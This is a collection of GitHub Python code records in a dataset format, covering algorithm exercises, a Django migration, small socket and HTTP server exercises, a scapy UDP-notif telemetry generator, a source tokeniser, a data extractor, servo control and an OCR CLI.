1+self.countNodesOptimized(root.left)+self.countNodesOptimized(root.right)\n","repo_name":"anuragchris/Python-Data-Structures","sub_path":"Trees/CountCompleteTreeNodes.py","file_name":"CountCompleteTreeNodes.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41917446044","text":"\"\"\"\nHash Tables: Ransom Note\n\nhttps://www.hackerrank.com/challenges/ctci-ransom-note\n\"\"\"\nimport unittest\nfrom collections import Counter\n\n\ndef ransom_note(magazine, ransom):\n words = Counter(magazine)\n\n for word in ransom:\n if word not in words or words[word] == 0:\n return False\n else:\n words[word] -= 1\n\n return True\n\n\nif __name__ == '__main__':\n m, n = map(int, input().strip().split(' '))\n magazine = input().strip().split(' ')\n ransom = input().strip().split(' ')\n\n answer = ransom_note(magazine, ransom)\n if answer:\n print(\"Yes\")\n else:\n print(\"No\")\n\n\nclass TestRansomNote(unittest.TestCase):\n def test_ransom_note(self):\n self.assertEqual(\n True,\n ransom_note(\"give me one grand today night\", \"give one grand today\")\n )\n\n self.assertEqual(\n False,\n ransom_note(\"give me one grand today night\", \"give one grand hello\")\n )\n\n self.assertEqual(\n False,\n ransom_note(\"give me one grand today night\", \"give one grand grand today\")\n )\n","repo_name":"chanshik/HackerRank","sub_path":"ctci-ransom-note.py","file_name":"ctci-ransom-note.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20475757393","text":"import sys\nimport math\n\ninput = sys.stdin.readline\n\nn = int(input())\n\nlst = []\n\nfor i in range(n):\n lst.append(int(input()))\n \ndef is_prime_number(x):\n for i in range(2,int(math.sqrt(x))+1):\n if x % i == 0:\n return False\n return True\n\nfor i in lst:\n x = i\n if x == 0 or x == 1:\n print(2)\n continue\n else:\n while is_prime_number(x) == False:\n x += 1\n print(x)\n \n ","repo_name":"minyou2675/Baekjoon_Algorithms","sub_path":"Numbers/4134.py","file_name":"4134.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19645244185","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base', '0020_auto_20160213_2111'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='team',\n name='will_come',\n field=models.PositiveSmallIntegerField(default=2, verbose_name='will come to site', choices=[(0, 'yes'), (1, 'no'), (2, 'not decided yet')]),\n ),\n ]\n","repo_name":"SharifAIChallenge/AIC_mezzanine_site","sub_path":"base/migrations/0021_team_will_come.py","file_name":"0021_team_will_come.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"43904223623","text":"from socket import *\nimport datetime\n\nserverSocket = socket(AF_INET, SOCK_STREAM)\nserverPort = 6791\nserverSocket.bind(('',serverPort))\nserverSocket.listen(1)\nwhile True:\n\tprint ('Ready to serve...')\n\tconnectionSocket, addr = serverSocket.accept()\n\tprint (\"addr:\\n\", addr)\n\tmessage = connectionSocket.recv(1024)\n\tif not message:\n\t\tbreak\n\tf = open(message)\n\toutputdata = f.read()\n\tprint(\"data :\",outputdata)\n\toutput = bytes(outputdata, 'utf-8')\n\tconnectionSocket.send(output)\n\n\nconnectionSocket.close()","repo_name":"cerengumus/Mobile-Communication-Network","sub_path":"optionalExercisesWebServer/Exercises2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10896129470","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\n\nclass S(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n print(self.path)\n if self.path == \"/take\":\n if open(\"take.txt\", \"r\").read().strip()==\"yes\":\n open(\"take.txt\", \"w\").write(\"no\")\n else:\n open(\"take.txt\", \"w\").write(\"yes\")\n if self.path == \"/good\":\n if open(\"reward.txt\", \"r\").read().strip()!=\"0\":\n open(\"reward.txt\", \"w\").write(\"0\")\n else:\n open(\"reward.txt\", \"w\").write(\"1\")\n if self.path == \"/bad\":\n if open(\"reward.txt\", \"r\").read().strip()!=\"0\":\n open(\"reward.txt\", \"w\").write(\"0\")\n else:\n open(\"reward.txt\", \"w\").write(\"-1\")\n self._set_headers()\n classification = open(\"classification.txt\", \"r\").read()\n # self.wfile.write(bytes(\"

\"+str(classification)+\"

\", \"utf-8\"))\n self.wfile.write(bytes(str(classification), \"utf-8\"))\n\n def do_HEAD(self):\n self._set_headers()\n\n def do_POST(self):\n # Doesn't do anything with posted data\n self._set_headers()\n self.wfile.write(bytes(\"

POST!

\", \"utf-8\"))\n\ndef run(server_class=HTTPServer, handler_class=S, port=80):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print('Starting httpd...')\n httpd.serve_forever()\n\nrun(port=42069)\n","repo_name":"oxai/vrai","sub_path":"agent/neos/tumblebee/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"75"} +{"seq_id":"21078965606","text":"# page 106\n\nfrom collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n def alienOrder(self, words: List[str]) -> str:\n adjList = defaultdict(list)\n\n for i in range(len(words) - 1):\n word1, word2 = words[i], words[i + 1]\n minL = min(len(word1), len(word2))\n\n # if word1 is longer than word2 and word2 is a prefix of word1, then the order is invalid (weird edge case)\n if len(word1) > len(word2) and word1[:minL] == word2[:minL]:\n return \"\"\n\n # finding the first point of difference between word1 and word2, to establish the relative order\n # of the 2 differing characters\n for j in range(minL):\n if word1[j] != word2[j]:\n adjList[word1[j]].append(word2[j])\n break\n\n # if a char is present in visited => it has been visited. The Bool value indicates if it's in the current path\n visited = {}\n result = [] # to store the (reverse) topological ordering\n\n # topological sort / post order dfs\n\n # this function returns true if the current path has a cycle\n def dfs(char):\n if char in visited:\n # if the char has already been visited in the current path => there's a cycle\n return visited[char]\n\n visited[char] = True\n\n if char in adjList:\n for nei in adjList[char]:\n if dfs(nei):\n return True\n\n visited[char] = False\n result.append(char)\n\n for char in adjList:\n if dfs(char): # if there's a cycle in the current path => invalid ordering\n return \"\"\n\n reversed(result)\n return \"\".join(result)\n","repo_name":"TareshBatra/pyLeetCode","sub_path":"Graphs/alien-dictionary-lc269.py","file_name":"alien-dictionary-lc269.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25968866510","text":"import logging\nimport random\nimport time\nfrom datetime import datetime\n\nfrom scapy.all import send\nfrom scapy.layers.inet import IP, UDP\n\nfrom unyte_generator.models.opt import SEGMENTATION_OPT\nfrom unyte_generator.models.payload import PAYLOAD\nfrom unyte_generator.models.udpn import UDPN\nfrom unyte_generator.models.unyte_global import (UDPN_HEADER_LEN,\n UDPN_SEGMENTATION_OPT_LEN)\nfrom unyte_generator.unyte_generator import UDP_notif_generator\n\n\nclass UDP_notif_generator_draft_11(UDP_notif_generator):\n\n def __init__(self, args):\n super().__init__(args=args)\n\n def __generate_udp_notif_packets(self, yang_push_msgs: list, encoding: str) -> list:\n payload_per_msg_len = self.mtu - UDPN_HEADER_LEN\n\n udp_notif_packets: list = [] # list[list[msg]]\n for payload in yang_push_msgs:\n # check if segmentation is needed\n if (len(payload) + UDPN_HEADER_LEN) > self.mtu:\n payload_per_msg_len = self.mtu - UDPN_HEADER_LEN - UDPN_SEGMENTATION_OPT_LEN\n udp_notif_segmented_pckts = len(payload) // payload_per_msg_len\n if len(payload) % payload_per_msg_len != 0:\n udp_notif_segmented_pckts += 1\n else:\n udp_notif_segmented_pckts = 1\n\n aggregated_msgs: list = []\n for packet_increment in range(udp_notif_segmented_pckts):\n if udp_notif_segmented_pckts == 1:\n packet = IP(src=self.source_ip, dst=self.destination_ip)/UDP()/UDPN()/PAYLOAD()\n else:\n packet = IP(src=self.source_ip, dst=self.destination_ip)/UDP()/UDPN()/SEGMENTATION_OPT()/PAYLOAD()\n\n packet.sport = self.source_port\n packet.dport = self.destination_port\n if udp_notif_segmented_pckts == 1:\n packet[UDPN].header_length = UDPN_HEADER_LEN\n packet[PAYLOAD].message = payload\n packet[UDPN].message_length = packet[UDPN].header_length + len(packet[PAYLOAD].message)\n else:\n packet[UDPN].header_length = UDPN_HEADER_LEN + UDPN_SEGMENTATION_OPT_LEN\n packet[SEGMENTATION_OPT].segment_id = packet_increment\n if (len(payload[payload_per_msg_len * packet_increment:]) > payload_per_msg_len):\n packet[PAYLOAD].message = payload[payload_per_msg_len * packet_increment:payload_per_msg_len * (packet_increment + 1)]\n packet[UDPN].message_length = packet[UDPN].header_length + len(packet[PAYLOAD].message)\n else:\n packet[PAYLOAD].message = payload[payload_per_msg_len * packet_increment:]\n packet[UDPN].message_length = packet[UDPN].header_length + len(packet[PAYLOAD].message)\n packet[SEGMENTATION_OPT].last = 1\n if encoding == 'json':\n packet[UDPN].media_type = 1\n elif encoding == 'xml':\n packet[UDPN].media_type = 2\n elif encoding == 'cbor':\n packet[UDPN].media_type = 3\n\n aggregated_msgs.append(packet)\n udp_notif_packets.append(aggregated_msgs)\n return udp_notif_packets\n\n def __forward_current_message(self, udp_notif_msgs: list, current_domain_id: int) -> int:\n current_message_lost_packets = 0\n # if self.random_order: # FIXME: random reorder\n # random.shuffle(udp_notif_msgs)\n\n if current_domain_id not in self.msg_id:\n self.msg_id[current_domain_id] = 0\n\n msg_id = self.msg_id[current_domain_id]\n for packet in udp_notif_msgs:\n packet[UDPN].observation_domain_id = current_domain_id\n packet[UDPN].message_id = msg_id\n if (self.probability_of_loss == 0):\n send(packet, verbose=0)\n elif random.randint(1, int(1000 * (1 / self.probability_of_loss))) >= 1000:\n send(packet, verbose=0)\n else:\n current_message_lost_packets += 1\n if len(udp_notif_msgs) == 1:\n logging.info(\"simulating packet number 0 from message_id \" + str(packet[UDPN].message_id) + \" lost\")\n else:\n logging.info(\"simulating packet number \" + str(packet[SEGMENTATION_OPT].segment_id) +\n \" from message_id \" + str(packet[UDPN].message_id) + \" lost\")\n if len(udp_notif_msgs) == 1:\n self.logger.log_packet(packet)\n else:\n self.logger.log_segment(packet, packet[SEGMENTATION_OPT].segment_id)\n self.save_pcap(packet)\n msg_id += 1\n self.msg_id[current_domain_id] = msg_id\n\n return current_message_lost_packets\n\n def _stream_infinite_udp_notif(self, encoding: str):\n observation_domain_id = self.initial_domain\n\n seq_nb = 0\n time_reference = datetime.now()\n obs_domain_ids = [obs_id for obs_id in range(self.initial_domain, self.initial_domain + self.additional_domains + 1, 1)]\n # Send subscription-started notification first\n subs_started: str = ''\n if encoding == 'json':\n subs_started = self.mock_payload_reader.get_json_subscription_started_notif(msg_timestamp=time_reference, sequence_number=seq_nb, observation_domain_ids=obs_domain_ids)\n elif encoding == 'xml':\n subs_started = self.mock_payload_reader.get_xml_subscription_started_notif(msg_timestamp=time_reference, sequence_number=seq_nb, observation_domain_ids=obs_domain_ids)\n elif encoding == 'cbor':\n subs_started = self.mock_payload_reader.get_cbor_subscription_started_notif(msg_timestamp=time_reference, sequence_number=seq_nb, observation_domain_ids=obs_domain_ids)\n\n seq_nb += 1\n\n udp_notif_msgs: list[list] = self.__generate_udp_notif_packets(yang_push_msgs=[subs_started], encoding=encoding)\n for udp_notif_msg in udp_notif_msgs:\n self.__forward_current_message(udp_notif_msg, observation_domain_id)\n\n while True:\n yang_push_payloads: list[str] = []\n if encoding == 'json':\n yang_push_payloads = self.mock_payload_reader.get_json_push_update_1_notif(msg_timestamp=time_reference, sequence_number=seq_nb)\n elif encoding == 'xml':\n yang_push_payloads = self.mock_payload_reader.get_xml_push_update_1_notif(msg_timestamp=time_reference, sequence_number=seq_nb)\n elif encoding == 'cbor':\n yang_push_payloads = self.mock_payload_reader.get_cbor_push_update_1_notif(msg_timestamp=time_reference, sequence_number=seq_nb)\n\n # Generate packet only once\n udp_notif_msgs: list[list] = self.__generate_udp_notif_packets(yang_push_msgs=[yang_push_payloads], encoding=encoding)\n\n for udp_notif_msg in udp_notif_msgs:\n self.__forward_current_message(udp_notif_msg, observation_domain_id)\n\n time.sleep(self.waiting_time)\n observation_domain_id += 1\n\n if observation_domain_id > (self.initial_domain + self.additional_domains):\n observation_domain_id = self.initial_domain\n time_reference = datetime.now()\n seq_nb += 1\n\n def _send_n_udp_notif(self, message_to_send: int, encoding: str):\n payloads: list[str] = []\n\n if encoding == 'xml':\n payloads = self._get_n_xml_payloads(push_update_msgs=message_to_send)\n elif encoding == 'json':\n payloads = self._get_n_json_payloads(push_update_msgs=message_to_send)\n elif encoding == 'cbor':\n payloads = self._get_n_cbor_payloads(push_update_msgs=message_to_send)\n\n lost_packets = 0\n forwarded_packets = 0\n\n # Generate packet only once\n udp_notif_msgs: list[list] = self.__generate_udp_notif_packets(yang_push_msgs=payloads, encoding=encoding)\n\n observation_domain_id = self.initial_domain\n # if self.random_order:\n # random.shuffle(udp_notif_msgs)\n\n for udp_notif_msg_group in udp_notif_msgs:\n current_message_lost_packets: int = self.__forward_current_message(udp_notif_msg_group, observation_domain_id)\n forwarded_packets += len(udp_notif_msg_group) - current_message_lost_packets\n lost_packets += current_message_lost_packets\n\n time.sleep(self.waiting_time)\n observation_domain_id += 1\n\n if observation_domain_id > (self.initial_domain + self.additional_domains):\n observation_domain_id = self.initial_domain\n logging.info('Sent ' + str(forwarded_packets) + ' messages')\n logging.info('Simulated %d lost packets from %d total packets', lost_packets, (forwarded_packets + lost_packets))\n","repo_name":"network-analytics/udp-notif-scapy","sub_path":"src/unyte_generator/unyte_generator_draft_11.py","file_name":"unyte_generator_draft_11.py","file_ext":"py","file_size_in_byte":8945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"26576650499","text":"\"\"\"Contains functionality for tokenising Python source code.\"\"\"\r\n\r\n\r\nimport re\r\n\r\n\r\nVALID_TOKEN_TYPES = (\r\n\t\"identifier\", \"from\", \"import\", \".\", \",\", \"*\", \"other\"\r\n)\r\nVALID_STRING_DELIMITERS = (\r\n\t\"\\'\", \"\\\"\", \"\\'\\'\\'\", \"\\\"\\\"\\\"\"\r\n)\r\nREGEX_TEMPLATE = r'([^\\\\]{}|\\\\\\\\{})'\r\nEND_OF_STRING_REGEXES = {}\r\nfor delimeter in VALID_STRING_DELIMITERS:\r\n\tregexStr = REGEX_TEMPLATE.format(delimeter, delimeter)\r\n\tEND_OF_STRING_REGEXES[delimeter] = re.compile(regexStr)\r\n\r\nclass Token:\r\n\r\n\t\"\"\"Represents a single token.\"\"\"\r\n\r\n\tdef __init__(self, tokenType, value = None):\r\n\t\t\"\"\"Construct a new instance of Token.\r\n\r\n\t\tArguments:\r\n\t\ttokenType -- String value dneoting the TYPE of the token.\r\n\t\t\t\t\t If this string is not in VALID_TOKEN_TYPES,\r\n\t\t\t\t\t then a ValueError is raised.\r\n\r\n\t\tKeyword arguments:\r\n\t\tvalue -- Value of the token (exact meaning depends on the\r\n\t\t\t\t token's type). If not provided, then the token's\r\n\t\t\t\t type also becomes its value. (default: None)\r\n\r\n\t\t\"\"\"\r\n\t\tif not tokenType in VALID_TOKEN_TYPES:\r\n\t\t\traise ValueError(\"Invalid token type '{}' given\".format(tokenType))\r\n\r\n\t\tself.type = tokenType\r\n\t\tif value:\r\n\t\t\tself.value = value\r\n\t\telse:\r\n\t\t\tself.value = self.type\r\n\r\n\tdef __eq__(self, other):\r\n\t\t\"\"\"Return True if both instances of token have equivalent types and values.\r\n\r\n\t\tArguments:\r\n\t\tother -- Instance of Token to compare with\r\n\r\n\t\t\"\"\"\r\n\t\treturn (self.type == other.type and self.value == other.value)\r\n\r\n\tdef __ne__(self, other):\r\n\t\t\"\"\"Return True if both instances of token do NOT have equivalent types and values.\r\n\r\n\t\tArguments:\r\n\t\tother -- Instance of Token to compare with\r\n\r\n\t\t\"\"\"\r\n\t\treturn (self.type != other.type or self.value != other.value)\r\n\r\n\tdef __repr__(self):\r\n\t\t\"\"\"Return human-readable represetation of Token instance.\"\"\"\r\n\t\treturn str(self)\r\n\r\n\tdef __str__(self):\r\n\t\t\"\"\"Return string representation of Token instance.\"\"\"\r\n\t\treturn \"({}, {})\".format(self.type, self.value)\r\n\r\n\r\nclass Tokeniser:\r\n\r\n\t\"\"\"Class used to tokenise textual Python source code.\r\n\r\n\tNote that the tokens returned do not represent full Python source\r\n\tcode - it is merely a stripped down set of tokens intended\r\n\tto be used purely for identifying import dependencies.\r\n\r\n\t\"\"\"\r\n\r\n\tIDENTIFIER_REGEX = re.compile( r\"[a-zA-Z_][a-zA-Z0-9_]*\" )\r\n\r\n\tdef __init__(self):\r\n\t\t\"\"\"Construct new instance of Tokeniser.\"\"\"\r\n\t\tself.clear()\r\n\r\n\tdef clear(self):\r\n\t\t\"\"\"Reset tokeniser's state, making it ready to tokenise another source.\"\"\"\r\n\t\tself.tokens = []\r\n\t\tself.source = \"\"\r\n\t\tself.index = 0\r\n\r\n\tdef currentChar(self):\r\n\t\t\"\"\"Return current character from source, or None if index is out of bounds.\"\"\"\r\n\t\tif self.index < len(self.source):\r\n\t\t\treturn self.source[self.index]\r\n\t\telse:\r\n\t\t\treturn None\r\n\r\n\tdef nextChar(self):\r\n\t\t\"\"\"Increment character index and returns the new character.\"\"\"\r\n\t\tself.index += 1\r\n\t\treturn self.currentChar()\r\n\r\n\tdef peekChar(self):\r\n\t\t\"\"\"Return next character but doesn't increment the character index.\"\"\"\r\n\t\tif (self.index + 1) < len(self.source):\r\n\t\t\treturn self.source[self.index + 1]\r\n\t\telse:\r\n\t\t\treturn None\r\n\r\n\tdef tokenise(self, source):\r\n\t\t\"\"\"Return list of Token objects by tokensing Python source code.\r\n\r\n\t\tArguments:\r\n\t\tsource -- Python source code to tokenise\r\n\r\n\t\t\"\"\"\r\n\t\tif not isinstance(source, str):\r\n\t\t\traise TypeError(\"Source to tokenise must be a string\")\r\n\r\n\t\tself.clear()\r\n\t\tself.source = source\r\n\r\n\t\t# Maintain buffer which stores currently scanned token\r\n\t\tbuff = []\r\n\t\tch = self.currentChar() # get first character\r\n\t\t# Go through each character of source string\r\n\t\twhile ch:\r\n\t\t\tif ch in (\" \", \"\\n\", \"\\t\", \"\\r\"): # ignore whitespace - breaks current token\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\telif ch in VALID_STRING_DELIMITERS:\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\t\t# Perform a look-ahead by three characters to check\r\n\t\t\t\t# exactly which delimiter is being used\r\n\t\t\t\tstart = self.index\r\n\t\t\t\tend = min(start + 3, len(self.source))\r\n\t\t\t\tfull = self.source[start:end]\r\n\t\t\t\t# If the three characters represent a valid delimiter,\r\n\t\t\t\t# use that. If it's not, then just use the single character\r\n\t\t\t\tif full in VALID_STRING_DELIMITERS:\r\n\t\t\t\t\tself.skipString(full)\t\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.skipString(ch)\r\n\t\t\telif ch == \"#\":\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\t\tself.skipComment()\r\n\t\t\telif ch in (\".\", \",\", \"*\"): # if character is operator we care about\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\t\tself.addToken(ch, ch)\r\n\t\t\telif ch.isalnum() or ch == \"_\": # if character IS a word character (alphanumeric or \"_\")\r\n\t\t\t\tbuff.append(ch)\r\n\t\t\telse: # if character is not a word character\r\n\t\t\t\tself.addTokenFromBuffer(buff)\r\n\t\t\t\tself.addToken(\"other\", ch)\r\n\r\n\t\t\t# Get the next character\r\n\t\t\tch = self.nextChar()\r\n\r\n\t\t# Dump whatever is remaining in the buffer to a token\r\n\t\tself.addTokenFromBuffer(buff)\r\n\r\n\t\t# Clear the token list for later tokenisations\r\n\t\tfoundTokens = self.tokens\r\n\t\tself.clear()\r\n\t\treturn foundTokens\r\n\r\n\tdef addToken(self, tokenType, value):\r\n\t\t\"\"\"Add token to tokeniser's store.\r\n\r\n\t\tArguments:\r\n\t\ttokenType -- Type the newly added token should have\r\n\t\tvalue -- Value the newly added token should have\r\n\r\n\t\t\"\"\"\r\n\t\tself.tokens.append( Token(tokenType, value) )\r\n\r\n\tdef addTokenFromBuffer(self, buff):\r\n\t\t\"\"\"Look into contents of buffer and use it to construct a new token.\r\n\r\n\t\tIf buffer is empty, nothing is done. Calling this clears the\r\n\t\tbuffer afterwards.\r\n\r\n\t\tArguments:\r\n\t\tbuff -- List containing all the characters currently in the\r\n\t\t\t\ttoken buffer\r\n\r\n\t\t\"\"\"\r\n\t\t# If buffer is empty, we don't bother adding it as a token\r\n\t\tif len(buff) == 0:\r\n\t\t\treturn\r\n\r\n\t\t# Get contents of buffer as a string\r\n\t\tbufferStr = \"\".join(buff)\r\n\t\t# Check if buffer is a keyword we care about\r\n\t\tif bufferStr == \"from\":\r\n\t\t\tself.tokens.append( Token(\"from\") )\r\n\t\telif bufferStr == \"import\":\r\n\t\t\tself.tokens.append( Token(\"import\") )\r\n\t\telse:\r\n\t\t\t# Check if buffer is a valid identifier.\r\n\t\t\tif self.IDENTIFIER_REGEX.search(bufferStr):\r\n\t\t\t\ttokenType = \"identifier\"\r\n\t\t\telse:\r\n\t\t\t\ttokenType = \"other\"\r\n\t\t\t# Add token with the found type and make sure to clear the buffer\r\n\t\t\tself.tokens.append( Token(tokenType, bufferStr) )\r\n\t\t# Clear buffer\r\n\t\tdel buff[:]\r\n\r\n\tdef skipComment(self):\r\n\t\t\"\"\"Skip characters until end of comment (newline) is found.\r\n\r\n\t\tAssumes current character is a \"#\". Ends on newline chararacter\r\n\t\tor end of source.\r\n\r\n\t\t\"\"\"\r\n\t\tch = self.nextChar()\r\n\t\twhile ch and ch != \"\\n\":\r\n\t\t\tch = self.nextChar()\r\n\r\n\tdef skipString(self, startingChar):\r\n\t\t\"\"\"Skip characters until end of string literal is found.\r\n\r\n\t\tAssumes current character is the LAST character of the\r\n\t\tstarting string literal. Ends on the LAST character\r\n\t\tof the closing string delimiter or end of source.\r\n\r\n\t\tArguments:\r\n\t\tstartingChar -- The quote character(s) that started\r\n\t\t\t\t\t\tthe literal. Used to determine when\r\n\t\t\t\t\t\tthe literal ends. ValueError is\r\n\t\t\t\t\t\traised if this is not a valid string\r\n\t\t\t\t\t\tdelimiter.\r\n\r\n\t\t\"\"\"\r\n\t\tif not startingChar in VALID_STRING_DELIMITERS:\r\n\t\t\traise ValueError(\"{} is not a valid string delimiter\".format(startingChar))\r\n\r\n\t\t# If the immediate next character ends the string (empty string), just move to the\r\n\t\t# next character\r\n\t\tif (self.peekChar() == startingChar):\r\n\t\t\tself.nextChar()\r\n\t\telse:\r\n\t\t\t# Find first occurrence of required string delimeter\r\n\t\t\t# from the remaining string, wheere it DOES NOT precede\r\n\t\t\t# with an escape character (\\)\r\n\t\t\tremainingString = self.source[(self.index + 1):]\r\n\t\t\tmatch = END_OF_STRING_REGEXES[startingChar].search(remainingString)\r\n\t\t\tif match:\r\n\t\t\t\tself.index += match.end()\r\n\t\t\t# If an occurrence was not found, we've reached the end of the string\t\r\n\t\t\telse:\r\n\t\t\t\tself.index = len(self.source)","repo_name":"DonaldWhyte/module-dependency","sub_path":"moduledependency/tokeniser.py","file_name":"tokeniser.py","file_ext":"py","file_size_in_byte":7621,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"22244166087","text":"import os\nimport show_lists\n\nclass Update():\n def __init__(self, list_identifier, new_list_name):\n self.list_identifier = list_identifier\n self.new_list_name = new_list_name\n\n def update(self):\n lists = show_lists.ShowLists.show_lists()\n checker_for_existence_of_identifier = False\n list_identifier_with_brackets = \"[\" + str(self.list_identifier) + \"]\"\n for i in lists:\n if list_identifier_with_brackets in i:\n checker_for_existence_of_identifier = True\n list_name = i\n break\n if not checker_for_existence_of_identifier:\n return (\"List with unique identifier <\" + list_identifier + \"> not found\")\n list_name_with_ext = list_name + \".txt\"\n new_list_name_with_ext = \"[\" + str(self.list_identifier) + \"] \" + self.new_list_name + \".txt\"\n os.rename(list_name_with_ext, new_list_name_with_ext)\n if (list_name[4:] == self.new_list_name):\n return (\"The name remained the same: <\" + list_name[4:] + \">\")\n else:\n return (\"Updated <\" + list_name[4:] + \"> to <\" + self.new_list_name + \">.\")\n\n# def main():\n# test_object = Update(1, \"Hack\")\n# print (test_object.update())\n\n# if __name__ == '__main__':\n# main()\n","repo_name":"irin4eto/The-great-list","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41600268143","text":"import json\nfrom typing import Dict, Any, List, Union\nfrom easy_spider_tool import is_format_json, jsonpath\nfrom lxml import etree\n\nfrom easy_spider_tool_document.xpath import xpath\n\n__all__ = ['data_extractor', 'is_format_element']\n\n\ndef is_format_element(element_string: Union[str, etree._Element]) -> bool:\n # noinspection PyBroadException\n if isinstance(element_string, etree._Element):\n return True\n try:\n etree.HTML(element_string)\n return True\n except Exception as _:\n pass\n return False\n\n\ndef to_dict(src: Union[str, Dict[str, Any]]) -> Dict[str, Any]:\n if isinstance(src, dict):\n return src\n\n return json.loads(src)\n\n\ndef to_element(element: Union[str, etree._Element]) -> etree._Element:\n if isinstance(element, etree._Element):\n return element\n\n if isinstance(element, str):\n return etree.HTML(element)\n\n return etree.HTML('')\n\n\ndef element_type(string: str) -> str:\n \"\"\"获取类型\"\"\"\n if any([\n isinstance(string, dict),\n is_format_json(string),\n ]):\n return 'json'\n elif is_format_element(string):\n return 'element'\n return None\n\n\ndef data_extractor(src_data, expr: Union[str, List[str]], first: bool = False, default=None):\n \"\"\"json,xpath选择器\"\"\"\n # assert src_data, ''\n if not src_data:\n return default\n\n ele_type = element_type(src_data)\n\n if ele_type is None:\n return default\n\n values = None\n\n if isinstance(expr, str):\n expr = [expr]\n\n json_expr = list(filter(lambda x: x.startswith('$'), expr))\n xpath_expr = list(filter(lambda x: x.startswith('.') or x.startswith('/'), expr))\n\n if ele_type == 'json':\n if json_expr:\n data = to_dict(src_data)\n values = jsonpath(data, json_expr, first=first, default=default)\n\n if ele_type == 'element':\n if any(xpath_expr):\n data = to_element(src_data)\n values = xpath(data, xpath_expr, first=first, default=default)\n\n if len(values) < 1:\n values = default\n\n return values\n","repo_name":"hanxinkong/easy-spider-tool-document","sub_path":"easy_spider_tool_document/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2512647552","text":"class ServoSweep:\n \"\"\"A sample target class that gets invoked as a timer callback\"\"\"\n\n def __init__(\n self, pin, pin_adc=None, schedule=None, start_angle=0, step_degrees=30\n ):\n \"\"\"\n ;param pin : i/O pin\n ;param pin_adc: adc pin to log values - really should be a function or remoted\n ;param schedule : if running in IRQ should be micropython.schedule for safe irq handling\n ;param start_angle: servo should be initialized to some angle\n ;param step_degrees: size of each step\n \"\"\"\n self.target = pin\n self.pin_adc = pin_adc\n # need to allocate the reference prior to using it in a callback\n self.sweep_ref = self.sweep\n self.schedule = schedule\n # This will be wrong if not passed in\n self.target_angle = start_angle\n self.step_degrees = step_degrees\n self.debug_enabled = True\n\n def sweep(self, _):\n \"\"\"Actual callback target run via schedule(). Can be used directly if no allocations. We don't use the timer anyway\"\"\"\n if self.pin_adc:\n self.log_pin_adc(self.pin_adc)\n\n new_target = self.target_angle\n if self.target_angle < 180 and self.target_angle + self.step_degrees <= 180:\n new_target = self.target_angle + self.step_degrees\n else:\n new_target = 0\n # Does this allocate memory? Does this require schedule()?\n if self.debug_enabled:\n print(\"Sweeping to %s\" % (str(new_target)))\n self.target.write_angle(new_target)\n self.target_angle = new_target\n\n def irq_callback(self, t):\n \"\"\"Callback will schedule() an allocated sweep() if schedule() provided at init\"\"\"\n if self.schedule:\n self.schedule(self.sweep_ref, 0)\n else:\n self.sweep_ref(0)\n\n def log_pin_adc(self, pin_adc):\n # try highest resolution first\n try:\n if self.debug_enabled:\n print(\"Analog: prev position raw u16: \" + str(pin_adc.read_u16()))\n except AttributeError:\n if self.debug_enabled:\n print(\"Analog prev position raw : \" + str(pin_adc.read()))\n","repo_name":"freemansoft/ESP8266-MicroPython","sub_path":"servosweep.py","file_name":"servosweep.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"20796017963","text":"import argparse\nimport keras_ocr\nimport json\nfrom conformity.Conformity import Conformity\npipeline = pipeline = keras_ocr.pipeline.Pipeline()\n\nmy_parser = argparse.ArgumentParser(description=\"Json giving information about a conformity file.\")\nmy_parser.add_argument('--save', help=\"save the printed result into a json file\", action=\"store_true\")\nmy_parser.add_argument('image_path', type= str, help=\"Path of image to check conformity for.\")\n\nargs = my_parser.parse_args()\n\nimage_path = args.image_path\n\nmy_conformity = Conformity(pipeline, image_path)\n\nresult = my_conformity.get_conformity()\nprint(result)\n\nif args.save:\n json_file_name = image_path.replace('.','_')\n json_file_name = json_file_name+'.json'\n with open(json_file_name, 'w') as json_file:\n json.dump(result, 